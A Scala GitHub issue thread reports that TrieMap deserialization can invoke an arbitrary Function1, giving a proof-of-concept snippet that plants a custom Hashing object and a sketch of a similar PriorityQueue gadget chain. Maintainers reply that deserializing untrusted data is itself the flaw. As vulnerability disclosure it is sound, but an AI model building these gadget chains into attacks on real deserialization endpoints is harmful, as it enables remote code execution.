`TrieMap` deserialization can invoke an arbitrary `Function1`

cryptoad commented 3 weeks ago

There seems to be no Security Policy for the Scala project, so I will just file this here.

This issue is akin to https://github.com/scala/scala/pull/10118, where LazyList could be abused to execute a Function0 during deserialization, which was assigned CVE-2022-36944 (cc: @lrytz)

TrieMap has a few paths that could lead to the execution of a Function1. The most straightforward one is:

scala/collection/concurrent/TrieMap.readObject(Ljava/io/ObjectInputStream;)V
scala/collection/concurrent/TrieMap.update(Ljava/lang/Object;Ljava/lang/Object;)V
scala/collection/concurrent/TrieMap.computeHash(Ljava/lang/Object;)I
scala/util/hashing/Hashing$$anon$1.hash(Ljava/lang/Object;)I

One can set a Hashing object in the TrieMap with an arbitrary hash function that will end up being executed when the TrieMap is deserialized. It just needs to be a serializable Function1, and there are plenty of those with potential security implications.

Other paths involve update+inserthc and maybe others.

Reproduction steps

The following is a PoC demonstrating the issue that was tested with Scala 2, setting hash to null:

import scala.collection.concurrent.TrieMap
import scala.util.hashing.Hashing
import scala.reflect.{ClassTag, classTag}
import java.io.{FileOutputStream,FileInputStream,ObjectOutputStream,ObjectInputStream}

val trieMap = TrieMap[String, Int]()
trieMap += ("toad" -> 1)
val hashing = Hashing.fromFunction((arg: Any) => throw new RuntimeException(s"ToadException $arg"))
// hashing.getClass.getDeclaredFields.foreach(println)
val hashField = hashing.getClass.getDeclaredField("f$1")
hashField.setAccessible(true)
hashField.set(hashing, null) // <== set a serializable Function1 here
val trieMapClass = classTag[TrieMap[_, _]].runtimeClass
val hashingField = trieMapClass.getDeclaredField("hashingobj")
hashingField.setAccessible(true)
hashingField.set(trieMap, hashing)

val fos = new FileOutputStream("/tmp/object.bin")
val oos = new ObjectOutputStream(fos)
oos.writeObject(trieMap)
oos.close

val fis = new FileInputStream("/tmp/object.bin")
val ois = new ObjectInputStream(fis)
// trigger the deserialization
val t = ois.readObject()
ois.close

This will result in the following exception during deserialization (since the function is null):

NullPointerException: Cannot invoke "scala.Function1.apply(Object)" because "this.f$1" is null
    at scala.util.hashing.Hashing$$anon$1.hash(Hashing.scala:42)
    at scala.collection.concurrent.TrieMap.computeHash(TrieMap.scala:821)
    at scala.collection.concurrent.TrieMap.update(TrieMap.scala:846)
    at scala.collection.concurrent.TrieMap.readObject(TrieMap.scala:674)
    at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77)
    at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.base/java.lang.reflect.Method.invoke(Method.java:568)
    at java.base/java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1100)
    at java.base/java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2423)
    at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2257)
    at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733)
    at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509)
    at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467)

Problem

Like for CVE-2022-36944, this means that TrieMap can be used as part of a gadget chain to obtain arbitrary code execution when deserializing an attacker controlled object.

lrytz commented 3 weeks ago

Thank you @cryptoad for your report.

There seems to be no Security Policy for the Scala project, so I will just file this here.

It's overdue that we create https://www.scala-lang.org/security, you're right.

About the report, I want to repeat what I wrote on https://github.com/scala/scala/pull/10118.

In order to attack a system using the mechanism you describe, the system needs to be deserializing untrusted data that an attacker can control. Deserializing untrusted data is always a security risk, if a system does so then that is the vulnerability.

We might be able to change certain exploitable classes on our side, but we cannot address the issue in general. In your example the entry point is in TrieMap, another example that was recently reported uses an entry point in the JDK (java.util.PriorityQueue) which can be used to execute Function0 instances on deserialization.

A typical Scala or Java application has many thousand classfiles on the classpath. The chance that any of them implements exploitable behavior on deserialization is always high.

If a specific gadget chain can be broken without impacting functionality and code maintainability, we might do so (PRs welcome). But generally we consider the issue as not addressable on our side.

sjrd commented 3 weeks ago

I agree with @lrytz. We should stop considering the existence of these patterns of code in classes as vulnerabilities. The only vulnerability is deserializing untrusted data with the Java serialization mechanism.

I suggested we close this ticket as "not a bug".

cryptoad commented 3 weeks ago

Understood, thank you for taking the time to answer. Could you please point me to the PriorityQueue issue? If anything can be done on our side, I'd like to make sure we are covered.

lrytz commented 3 weeks ago

That chain is

java.lang.PriorityQueue.readObject
  -> heapify
  -> siftDownUsingComparator
  -> (scala.math.Ordering$IterableOrdering: Comparator).compare
  -> (scala.collection.View$$anon$1 [defined in fromIteratorProvider]: IterableOnce).iterator
  -> Function0.apply

scala / bug

`TrieMap` deserialization can invoke an arbitrary `Function1` #13002

Reproduction steps

Problem